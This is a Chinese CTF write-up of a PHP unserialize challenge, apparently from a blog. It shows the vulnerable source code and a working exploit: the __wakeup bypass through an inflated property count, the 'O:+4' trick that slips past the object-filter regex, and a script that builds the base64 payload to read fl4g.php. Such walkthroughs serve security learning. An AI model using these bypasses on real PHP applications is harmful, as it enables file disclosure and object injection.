<?php
class Demo {
private $file = 'index.php';
public function __construct($file) {
$this->file = $file;
}
function __destruct() {
echo @highlight_file($this->file, true);
}
function __wakeup() {
if ($this->file != 'index.php') {
//the secret is in the fl4g.php
$this->file = 'index.php';
}
}
}
if (isset($_GET['var'])) {
$var = base64_decode($_GET['var']);
if (preg_match('/[oc]:\d+:/i', $var)) {
die('stop hacking!');
} else {
@unserialize($var);
}
} else {
highlight_file("index.php");
}
?>反序列化题,根据代码,flag在fl4g.php里,序列化fl4g.php然后再反序列化读取
这一段代码保留,说的是保证文件是index.php ,用的是函数_wakeup,这时要绕过
这一段是传入一个参数var,对它解码以及反序列化
进行编码获得fl4g.php文件的序列化后的值
<?php
class Demo {
private $file = 'index.php';
public function __construct($file) {
$this->file = $file;
}
function __destruct() {
echo @highlight_file($this->file, true);
}
function __wakeup() {
if ($this->file != 'index.php') {
//the secret is in the fl4g.php
$this->file = 'index.php';
}
}
}
$a=new Demo('fl4g.php');
$b=serialize($a);
echo $b;
?>
只是这样是不行的,根据源代码
需要绕过_wakeup 1改2,让这个值大于原来的值可以绕过
O:4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}
绕过对序列化的检测 这里的机制是 /[oc]:\d+:/i
O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}
正号不改变正数的值,可以绕过检测
最后对它进行base64编码,但是用编码器编码会出问题,和%00*%00有关
就在代码中进行编码
法一:
直接编码这串代码
法二:
让程序运行过程中直接编码
<?php
class Demo {
private $file = 'index.php';
public function __construct($file) {
$this->file = $file;
}
function __destruct() {
echo @highlight_file($this->file, true);
}
function __wakeup() {
if ($this->file != 'index.php') {
//the secret is in the fl4g.php
$this->file = 'index.php';
}
}
}
$a=new Demo('fl4g.php');
$b=serialize($a);
echo $b;
$b=str_replace('O:4','O:+4',$b);
$b=str_replace(':1:',':2:',$b);
var_dump($b);
var_dump(base64_encode($b));
?>
2383
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
